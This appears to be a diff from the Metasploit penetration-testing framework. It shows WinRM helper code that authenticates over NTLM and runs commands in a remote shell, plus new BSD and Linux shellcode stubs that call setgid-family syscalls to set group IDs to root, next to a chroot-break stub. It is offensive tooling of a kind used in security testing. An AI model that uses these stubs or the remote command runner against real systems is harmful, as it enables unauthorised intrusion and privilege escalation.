return [] unless resp and resp.code == 401
|
||||
methods = []
|
||||
methods << "Negotiate" if resp.headers['WWW-Authenticate'].include? "Negotiate"
|
||||
methods << "Kerberos" if resp.headers['WWW-Authenticate'].include? "Kerberos"
|
||||
methods << "Basic" if resp.headers['WWW-Authenticate'].include? "Basic"
|
||||
return methods
|
||||
end
|
||||
|
||||
def winrm_run_cmd(cmd, timeout=20)
|
||||
resp,c = send_request_ntlm(winrm_open_shell_msg,timeout)
|
||||
|
||||
if resp.code == 401
|
||||
print_error "Login failure! Recheck supplied credentials."
|
||||
return resp .code
|
||||
end
|
||||
|
||||
unless resp.code == 200
|
||||
print_error "Got unexpected response: \n #{resp.to_s}"
|
||||
retval == resp.code || 0
|
||||
return retval
|
||||
end
|
||||
|
||||
shell_id = winrm_get_shell_id(resp)
|
||||
resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id),timeout)
|
||||
cmd_id = winrm_get_cmd_id(resp)
|
||||
resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id),timeout)
|
||||
streams = winrm_get_cmd_streams(resp)
|
||||
resp,c = send_request_ntlm(winrm_terminate_cmd_msg(shell_id,cmd_id),timeout)
|
||||
resp,c = send_request_ntlm(winrm_delete_shell_msg(shell_id))
|
||||
|
||||
return streams
|
||||
end
|
||||
|
||||
def winrm_wql_msg(wql)
|
||||
action = winrm_uri_action("wql")
|
||||
contents = winrm_header(action) + winrm_wql_body(wql)
|
||||
msg = winrm_envelope(contents)
|
||||
|
||||
return msg
|
||||
end
|
||||
|
||||
def winrm_open_shell_msg
|
||||
action = winrm_uri_action("create_shell")
|
||||
options = winrm_option_set([['WINRS_NOPROFILE', 'FALSE'], ['WINRS_CODEPAGE', '437']])
|
||||
header_data = action + options
|
||||
contents = winrm_header(header_data) + winrm_open_shell_body
|
||||
msg = winrm_envelope(contents)
|
||||
|
||||
return msg
|
||||
end
|
||||
|
||||
def winrm_cmd_msg(cmd,shell_id)
|
||||
action = winrm_uri_action("send_cmd")
|
||||
options = winrm_option_set([['WINRS_CONSOLEMODE_STDIN', 'TRUE'], ['WINRS_SKIP_CMD_SHELL', 'FALSE']])
|
||||
selectors = winrm_selector_set([['ShellId', shell_id]])
|
||||
header_data = action + options + selectors
|
||||
contents = winrm_header(header_data) + winrm_cmd_body(cmd)
|
||||
msg = winrm_envelope(contents)
|
||||
|
||||
return msg
|
||||
end
|
||||
|
||||
def winrm_cmd_recv_msg(shell_id,cmd_id)
|
||||
action = winrm_uri_action("recv_cmd")
|
||||
selectors = winrm_selector_set([['ShellId', shell_id]])
|
||||
header_data = action + selectors
|
||||
contents = winrm_header(header_data) + winrm_cmd_recv_body(cmd_id)
|
||||
msg = winrm_envelope(contents)
|
||||
|
||||
return msg
|
||||
end
|
||||
|
||||
def winrm_terminate_cmd_msg(shell_id,cmd_id)
|
||||
action = winrm_uri_action("signal_shell")
|
||||
selectors = winrm_selector_set([['ShellId', shell_id]])
|
||||
header_data = action + selectors
|
||||
contents = winrm_header(header_data) + winrm_terminate_cmd_body(cmd_id)
|
||||
msg = winrm_envelope(contents)
|
||||
|
||||
return msg
|
||||
end
|
||||
|
||||
def winrm_delete_shell_msg(shell_id)
|
||||
action = winrm_uri_action("delete_shell")
|
||||
selectors = winrm_selector_set([['ShellId', shell_id]])
|
||||
header_data = action + selectors
|
||||
contents = winrm_header(header_data) + winrm_empty_body
|
||||
msg = winrm_envelope(contents)
|
||||
|
||||
return msg
|
||||
end
|
||||
|
||||
def parse_wql_response(response)
|
||||
xml = response.body
|
||||
columns = []
|
||||
rows =[]
|
||||
rxml = REXML::Document.new(xml).root
|
||||
items = rxml.elements["///w:Items"]
|
||||
|
||||
items.elements.to_a("///w:XmlFragment").each do |node|
|
||||
row_data = []
|
||||
|
||||
node.elements.to_a.each do |sub_node|
|
||||
columns << sub_node.name
|
||||
row_data << sub_node.text
|
||||
end
|
||||
|
||||
rows << row_data
|
||||
end
|
||||
|
||||
response_data = Rex::Ui::Text::Table.new(
|
||||
'Header' => "#{datastore['WQL']} (#{rhost})",
|
||||
'Indent' => 1,
|
||||
'Columns' => columns.uniq!
|
||||
)
|
||||
|
||||
rows.each do |row|
|
||||
response_data << row
|
||||
end
|
||||
|
||||
return response_data
|
||||
end
|
||||
|
||||
def winrm_get_shell_id(response)
|
||||
xml = response.body
|
||||
shell_id = REXML::Document.new(xml).elements["//w:Selector"].text
|
||||
end
|
||||
|
||||
def winrm_get_cmd_id(response)
|
||||
xml = response.body
|
||||
cmd_id = REXML::Document.new(xml).elements["//rsp:CommandId"].text
|
||||
end
|
||||
|
||||
def winrm_get_cmd_streams(response)
|
||||
streams = {
|
||||
'stdout' => '',
|
||||
'stderr' => '',
|
||||
}
|
||||
|
||||
xml = response.body
|
||||
rxml = REXML::Document.new(xml).root
|
||||
|
||||
rxml.elements.to_a("//rsp:Stream").each do |node|
|
||||
next if node.text.nil?
|
||||
streams[node.attributes['Name']] << Rex::Text.base64_decode(node.text)
|
||||
end
|
||||
|
||||
return streams
|
||||
end
|
||||
|
||||
def generate_uuid
|
||||
::Rex::Proto::DCERPC::UUID.uuid_unpack(Rex::Text.rand_text(16))
|
||||
end
|
||||
|
||||
def send_request_ntlm(data, timeout = 20)
|
||||
opts = {
|
||||
'uri' => datastore['URI'],
|
||||
'data' => data,
|
||||
'username' => datastore['USERNAME'],
|
||||
'password' => datastore['PASSWORD']
|
||||
}
|
||||
|
||||
ntlm_options =
|
||||
{
|
||||
:signing => false,
|
||||
:usentlm2_session => datastore['NTLM::UseNTLM2_session'],
|
||||
:use_ntlmv2 => datastore['NTLM::UseNTLMv2'],
|
||||
:send_lm => datastore['NTLM::SendLM'],
|
||||
:send_ntlm => datastore['NTLM::SendNTLM']
|
||||
}
|
||||
|
||||
ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options)
|
||||
workstation_name = Rex::Text.rand_text_alpha(rand(8)+1)
|
||||
domain_name = datastore['DOMAIN']
|
||||
ntlm_message_1 = "NEGOTIATE " + Rex::Text::encode_base64(NTLM_UTILS::make_ntlmssp_blob_init( domain_name,
|
||||
workstation_name,
|
||||
ntlmssp_flags))
|
||||
|
||||
to = opts[:timeout] || timeout
|
||||
|
||||
begin
|
||||
c = connect(opts)
|
||||
ctype = "application/soap+xml;charset=UTF-8"
|
||||
# First request to get the challenge
|
||||
r = c.request_cgi(opts.merge({
|
||||
'uri' => opts['uri'],
|
||||
'method' => 'POST',
|
||||
'ctype' => ctype,
|
||||
'headers' => { 'Authorization' => ntlm_message_1},
|
||||
'data' => opts['data']
|
||||
}))
|
||||
|
||||
resp = c.send_recv(r, to)
|
||||
|
||||
unless resp.kind_of? Rex::Proto::Http::Response
|
||||
return [nil,nil]
|
||||
end
|
||||
|
||||
return [nil,nil] if resp.code == 404
|
||||
return [nil,nil] unless resp.code == 401 && resp.headers['WWW-Authenticate']
|
||||
# Get the challenge and craft the response
|
||||
ntlm_challenge = resp.headers['WWW-Authenticate'].match(/NEGOTIATE ([A-Z0-9\x2b\x2f=]+)/i)[1]
|
||||
return [nil,nil] unless ntlm_challenge
|
||||
|
||||
#old and simplier method but not compatible with windows 7/2008r2
|
||||
#ntlm_message_2 = Rex::Proto::NTLM::Message.decode64(ntlm_challenge)
|
||||
#ntlm_message_3 = ntlm_message_2.response( {:user => opts['username'],:password => opts['password']}, {:ntlmv2 => true})
|
||||
ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge)
|
||||
blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2)
|
||||
challenge_key = blob_data[:challenge_key]
|
||||
server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error
|
||||
#netbios name
|
||||
default_name = blob_data[:default_name] || ''
|
||||
#netbios domain
|
||||
default_domain = blob_data[:default_domain] || ''
|
||||
#dns name
|
||||
dns_host_name = blob_data[:dns_host_name] || ''
|
||||
#dns domain
|
||||
dns_domain_name = blob_data[:dns_domain_name] || ''
|
||||
#Client time
|
||||
chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || ''
|
||||
spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost}
|
||||
resp_lm,
|
||||
resp_ntlm,
|
||||
client_challenge,
|
||||
ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses(opts['username'], opts['password'], challenge_key,
|
||||
domain_name, default_name, default_domain,
|
||||
dns_host_name, dns_domain_name, chall_MsvAvTimestamp,
|
||||
spnopt, ntlm_options)
|
||||
ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth(domain_name, workstation_name, opts['username'],
|
||||
resp_lm, resp_ntlm, '', ntlmssp_flags)
|
||||
ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3)
|
||||
|
||||
# Send the response
|
||||
r = c.request_cgi(opts.merge({
|
||||
'uri' => opts['uri'],
|
||||
'method' => 'POST',
|
||||
'ctype' => ctype,
|
||||
'headers' => { 'Authorization' => "NEGOTIATE #{ntlm_message_3}"},
|
||||
'data' => opts['data']
|
||||
}))
|
||||
|
||||
resp = c.send_recv(r, to, true)
|
||||
|
||||
unless resp.kind_of? Rex::Proto::Http::Response
|
||||
return [nil,nil]
|
||||
end
|
||||
|
||||
return [nil,nil] if resp.code == 404
|
||||
return [resp,c]
|
||||
rescue ::Errno::EPIPE, ::Timeout::Error
|
||||
end
|
||||
end
|
||||
|
||||
def accepts_ntlm_auth
|
||||
parse_auth_methods(winrm_poke).include? "Negotiate"
|
||||
end
|
||||
|
||||
def target_url
|
||||
proto = "http"
|
||||
if rport == 5986 or datastore['SSL']
|
||||
proto = "https"
|
||||
end
|
||||
|
||||
if datastore['VHOST']
|
||||
return "#{proto}://#{datastore ['VHOST']}:#{rport}#{@uri.to_s}"
|
||||
else
|
||||
return "#{proto}://#{rhost}:#{rport}#{@uri.to_s}"
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
|
||||
private
|
||||
|
||||
def winrm_option_set(options)
|
||||
xml = "<w:OptionSet>"
|
||||
|
||||
options.each do |option_pair|
|
||||
xml << winrm_option(*option_pair)
|
||||
end
|
||||
|
||||
xml << "</w:OptionSet>"
|
||||
return xml
|
||||
end
|
||||
|
||||
def winrm_option(name,value)
|
||||
%Q{<w:Option Name="#{name}">#{value}</w:Option>}
|
||||
end
|
||||
|
||||
def winrm_selector_set(selectors)
|
||||
xml = "<w:SelectorSet>"
|
||||
|
||||
selectors.each do |selector_pair|
|
||||
xml << winrm_selector(*selector_pair)
|
||||
end
|
||||
|
||||
xml << "</w:SelectorSet>"
|
||||
return xml
|
||||
end
|
||||
|
||||
def winrm_selector(name,value)
|
||||
%Q{<w:Selector Name="#{name}">#{value}</w:Selector>}
|
||||
end
|
||||
|
||||
def winrm_wql_body(wql)
|
||||
%Q{
|
||||
<env:Body>
|
||||
<n:Enumerate>
|
||||
<w:OptimizeEnumeration xsi:nil="true"/>
|
||||
<w:MaxElements>32000</w:MaxElements>
|
||||
<w:Filter Dialect="http://schemas.microsoft.com/wbem/wsman/1/WQL">#{wql}</w:Filter>
|
||||
</n:Enumerate>
|
||||
</env:Body>
|
||||
}
|
||||
end
|
||||
|
||||
def winrm_open_shell_body
|
||||
%q{<env:Body>
|
||||
<rsp:Shell>
|
||||
<rsp:InputStreams>stdin</rsp:InputStreams>
|
||||
<rsp:OutputStreams>stdout stderr</rsp:OutputStreams>
|
||||
</rsp:Shell>
|
||||
</env:Body>}
|
||||
end
|
||||
|
||||
def winrm_cmd_body(cmd)
|
||||
%Q{ <env:Body>
|
||||
<rsp:CommandLine>
|
||||
<rsp:Command>"#{cmd}"</rsp:Command>
|
||||
</rsp:CommandLine>
|
||||
</env:Body>}
|
||||
end
|
||||
|
||||
def winrm_cmd_recv_body(cmd_id)
|
||||
%Q{<env:Body>
|
||||
<rsp:Receive>
|
||||
<rsp:DesiredStream CommandId="#{cmd_id}">stdout stderr</rsp:DesiredStream>
|
||||
</rsp:Receive>
|
||||
</env:Body>}
|
||||
end
|
||||
|
||||
def winrm_terminate_cmd_body(cmd_id)
|
||||
%Q{ <env:Body>
|
||||
<rsp:Signal CommandId="#{cmd_id}">
|
||||
<rsp:Code>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/signal/terminate</rsp:Code>
|
||||
</rsp:Signal>
|
||||
</env:Body>}
|
||||
end
|
||||
|
||||
def winrm_empty_body
|
||||
%q{<env:Body/>}
|
||||
end
|
||||
|
||||
def winrm_envelope(data)
|
||||
%Q{
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<env:Envelope xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd"
|
||||
xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config" xmlns:env="http://www.w3.org/2003/05/soap-envelope"
|
||||
xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"
|
||||
xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd"
|
||||
xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
|
||||
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> #{data}</env:Envelope>
|
||||
}
|
||||
end
|
||||
|
||||
def winrm_header(data)
|
||||
%Q{
|
||||
<env:Header>
|
||||
<a:To>#{target_url}</a:To>
|
||||
<a:ReplyTo>
|
||||
<a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
|
||||
</a:ReplyTo>
|
||||
<w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize>
|
||||
<a:MessageID>uuid:#{generate_uuid}</a:MessageID>
|
||||
<w:Locale mustUnderstand="false" xml:lang="en-US"/>
|
||||
<p:DataLocale mustUnderstand="false" xml:lang="en-US"/>
|
||||
<w:OperationTimeout>PT60S</w:OperationTimeout>
|
||||
#{data}
|
||||
</env:Header>
|
||||
}
|
||||
end
|
||||
|
||||
def winrm_uri_action(type)
|
||||
case type
|
||||
when "wql"
|
||||
return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/wmi/root/cimv2/*</w:ResourceURI>
|
||||
<a:Action mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/enumeration/Enumerate</a:Action>}
|
||||
when "create_shell"
|
||||
return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd</w:ResourceURI>
|
||||
<a:Action mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Create</a:Action>}
|
||||
when "send_cmd"
|
||||
return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd</w:ResourceURI>
|
||||
<a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Command</a:Action>}
|
||||
when "recv_cmd"
|
||||
return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd</w:ResourceURI>
|
||||
<a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Receive</a:Action>}
|
||||
when "signal_shell"
|
||||
return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd</w:ResourceURI>
|
||||
<a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Signal</a:Action>}
|
||||
when "delete_shell"
|
||||
return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd</w:ResourceURI>
|
||||
<a:Action mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Delete</a:Action>}
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
|
@ -208,6 +208,10 @@ class Module
|
|||
super(print_prefix + msg)
|
||||
end
|
||||
|
||||
def print_warning(msg='')
|
||||
super(print_prefix + msg)
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Overwrite the Subscriber print_line to do custom prefixes
|
||||
|
@ -241,6 +245,10 @@ class Module
|
|||
def vprint_debug(msg)
|
||||
print_debug(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE']
|
||||
end
|
||||
# Verbose version of #print_warning
|
||||
def vprint_warning(msg)
|
||||
print_warning(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE']
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the module's framework full reference name. This is the
|
||||
|
|
|
@ -12,38 +12,39 @@ class Msf::Module::Author
|
|||
# A hash of known author names
|
||||
Known =
|
||||
{
|
||||
'hdm' => 'hdm' + 0x40.chr + 'metasploit.com',
|
||||
'spoonm' => 'spoonm' + 0x40.chr + 'no$email.com',
|
||||
'skape' => 'mmiller' + 0x40.chr + 'hick.org',
|
||||
'vlad902' => 'vlad902' + 0x40.chr + 'gmail.com',
|
||||
'optyx' => 'optyx' + 0x40.chr + 'no$email.com',
|
||||
'anonymous' => 'anonymous-contributor' + 0x40.chr + 'metasploit.com',
|
||||
'stinko' => 'vinnie' + 0x40.chr + 'metasploit.com',
|
||||
'MC' => 'mc' + 0x40.chr + 'metasploit.com',
|
||||
'cazz' => 'bmc' + 0x40.chr + 'shmoo.com',
|
||||
'pusscat' => 'pusscat' + 0x40.chr + 'metasploit.com',
|
||||
'skylined' => 'skylined' + 0x40.chr + 'edup.tudelft.nl',
|
||||
'patrick' => 'patrick' + 0x40.chr + 'osisecurity.com.au',
|
||||
'Ramon de C Valle'=> 'rcvalle' + 0x40.chr + 'metasploit.com',
|
||||
'I)ruid' => 'druid' + 0x40.chr + 'caughq.org',
|
||||
'egypt' => 'egypt' + 0x40.chr + 'metasploit.com',
|
||||
'kris katterjohn' => 'katterjohn' + 0x40.chr + 'gmail.com',
|
||||
'CG' => 'cg' + 0x40.chr + 'carnal0wnage.com',
|
||||
'et' => 'et' + 0x40.chr + 'metasploit.com',
|
||||
'sf' => 'stephen_fewer' + 0x40.chr + 'harmonysecurity.com',
|
||||
'kf' => 'kf_list' + 0x40.chr + 'digitalmunition.com',
|
||||
'ddz' => 'ddz' + 0x40.chr + 'theta44.org',
|
||||
'jduck' => 'jduck' + 0x40.chr + 'metasploit.com',
|
||||
'natron' => 'natron' + 0x40.chr + 'metasploit.com',
|
||||
'todb' => 'todb' + 0x40.chr + 'metasploit.com',
|
||||
'msmith' => 'msmith' + 0x40.chr + 'metasploit.com',
|
||||
'jcran' => 'jcran' + 0x40.chr + 'metasploit.com',
|
||||
'sinn3r' => 'sinn3r' + 0x40.chr + 'metasploit.com',
|
||||
'bannedit' => 'bannedit' + 0x40.chr + 'metasploit.com',
|
||||
'amaloteaux' => 'alex_maloteaux' + 0x40.chr + 'metasploit.com',
|
||||
'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com',
|
||||
'juan vazquez' => 'juan.vazquez' + 0x40.chr + 'metasploit.com',
|
||||
'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com'
|
||||
'hdm' => 'hdm' + 0x40.chr + 'metasploit.com',
|
||||
'spoonm' => 'spoonm' + 0x40.chr + 'no$email.com',
|
||||
'skape' => 'mmiller' + 0x40.chr + 'hick.org',
|
||||
'vlad902' => 'vlad902' + 0x40.chr + 'gmail.com',
|
||||
'optyx' => 'optyx' + 0x40.chr + 'no$email.com',
|
||||
'anonymous' => 'anonymous-contributor' + 0x40.chr + 'metasploit.com',
|
||||
'stinko' => 'vinnie' + 0x40.chr + 'metasploit.com',
|
||||
'MC' => 'mc' + 0x40.chr + 'metasploit.com',
|
||||
'cazz' => 'bmc' + 0x40.chr + 'shmoo.com',
|
||||
'pusscat' => 'pusscat' + 0x40.chr + 'metasploit.com',
|
||||
'skylined' => 'skylined' + 0x40.chr + 'edup.tudelft.nl',
|
||||
'patrick' => 'patrick' + 0x40.chr + 'osisecurity.com.au',
|
||||
'Ramon de C Valle' => 'rcvalle' + 0x40.chr + 'metasploit.com',
|
||||
'I)ruid' => 'druid' + 0x40.chr + 'caughq.org',
|
||||
'egypt' => 'egypt' + 0x40.chr + 'metasploit.com',
|
||||
'kris katterjohn' => 'katterjohn' + 0x40.chr + 'gmail.com',
|
||||
'CG' => 'cg' + 0x40.chr + 'carnal0wnage.com',
|
||||
'et' => 'et' + 0x40.chr + 'metasploit.com',
|
||||
'sf' => 'stephen_fewer' + 0x40.chr + 'harmonysecurity.com',
|
||||
'kf' => 'kf_list' + 0x40.chr + 'digitalmunition.com',
|
||||
'ddz' => 'ddz' + 0x40.chr + 'theta44.org',
|
||||
'jduck' => 'jduck' + 0x40.chr + 'metasploit.com',
|
||||
'natron' => 'natron' + 0x40.chr + 'metasploit.com',
|
||||
'todb' => 'todb' + 0x40.chr + 'metasploit.com',
|
||||
'msmith' => 'msmith' + 0x40.chr + 'metasploit.com',
|
||||
'jcran' => 'jcran' + 0x40.chr + 'metasploit.com',
|
||||
'sinn3r' => 'sinn3r' + 0x40.chr + 'metasploit.com',
|
||||
'bannedit' => 'bannedit' + 0x40.chr + 'metasploit.com',
|
||||
'amaloteaux' => 'alex_maloteaux' + 0x40.chr + 'metasploit.com',
|
||||
'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com',
|
||||
'juan vazquez' => 'juan.vazquez' + 0x40.chr + 'metasploit.com',
|
||||
'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com',
|
||||
'mubix' => 'mubix' + 0x40.chr + 'hak5.org'
|
||||
}
|
||||
|
||||
#
|
||||
|
|
|
@ -40,6 +40,27 @@ module Msf::Payload::Bsd
|
|||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetresgid',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setresgid(0, 0, 0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetregid',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setregid(0, 0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetgid',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setgid(0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('AppendExit',
|
||||
[
|
||||
false,
|
||||
|
@ -99,6 +120,35 @@ module Msf::Payload::Bsd
|
|||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetresgid'])
|
||||
# setresgid(0, 0, 0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x66\xb8\x38\x01" +# movw $0x0138,%ax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetregid'])
|
||||
# setregid(0, 0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x7f" +# movb $0x7f,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetgid'])
|
||||
# setgid(0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\xb5" +# movb $0xb5,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
# Append
|
||||
|
||||
if (datastore['AppendExit'])
|
||||
|
|
|
@ -40,6 +40,27 @@ module Msf::Payload::Linux
|
|||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetresgid',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setresgid(0, 0, 0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetregid',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setregid(0, 0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetgid',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setgid(0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependChrootBreak',
|
||||
[
|
||||
false,
|
||||
|
@ -102,6 +123,31 @@ module Msf::Payload::Linux
|
|||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetresgid'])
|
||||
# setresgid(0, 0, 0)
|
||||
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
||||
"\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\xf7\xe3" +# mull %ebx #
|
||||
"\xb0\xaa" +# movb $0xaa,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetregid'])
|
||||
# setregid(0, 0)
|
||||
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
||||
"\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\x6a\x47" +# pushl $0x47 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetgid'])
|
||||
# setgid(0)
|
||||
pre << "\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\x6a\x2e" +# pushl $0x2e #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
if (datastore['PrependChrootBreak'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
||||
|
@ -185,6 +231,33 @@ module Msf::Payload::Linux
|
|||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetresgid'])
|
||||
# setresgid(0, 0, 0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
|
||||
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\xab" +# addi r0,r31,-341 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetregid'])
|
||||
# setregid(0, 0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x48" +# addi r0,r31,-440 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetgid'])
|
||||
# setgid(0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x2f" +# addi r0,r31,-465 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
|
||||
if (datastore['PrependChrootBreak'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
|
@ -235,6 +308,33 @@ module Msf::Payload::Linux
|
|||
pre << "\x0f\x05" # syscall #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetresgid'])
|
||||
# setresgid(0, 0, 0)
|
||||
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x48\x89\xfe" # mov rsi,rdi #
|
||||
pre << "\x6a\x77" # push 0x77 #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetregid'])
|
||||
# setregid(0, 0)
|
||||
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x48\x89\xfe" # mov rsi,rdi #
|
||||
pre << "\x48\x89\xf2" # mov rdx,rsi #
|
||||
pre << "\x6a\x72" # push 0x72 #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetgid'])
|
||||
# setgid(0)
|
||||
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x6a\x6a" # push 0x6a #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
end
|
||||
|
||||
if (datastore['PrependChrootBreak'])
|
||||
|
||||
# setreuid(0, 0)
|
||||
|
@ -269,7 +369,7 @@ module Msf::Payload::Linux
|
|||
pre << "\x48\x89\xe7" # mov rdi,rsp #
|
||||
|
||||
# loop chdir(..) 69 times
|
||||
# syscall tendo to modify rcx can't use loop...
|
||||
# syscall tend to modify rcx can't use loop...
|
||||
pre << "\x6a\x45" # push 0x45 #
|
||||
pre << "\x5b" # pop rbx #
|
||||
pre << "\x6a\x50" # push 0x50 #
|
||||
|
@ -278,7 +378,7 @@ module Msf::Payload::Linux
|
|||
pre << "\xfe\xcb" # dec bl #
|
||||
pre << "\x75\xf7" # jnz -7 #
|
||||
|
||||
# chrot (.) (witch should by /)
|
||||
# chroot (.) (which should be /)
|
||||
pre << "\x6a\x2e" # push . (0x2e) #
|
||||
pre << "\x48\x89\xe7" # mov rdi,rsp #
|
||||
pre << "\x48\x89\xd0" # mov rax,rdx #
|
||||
|
|
|
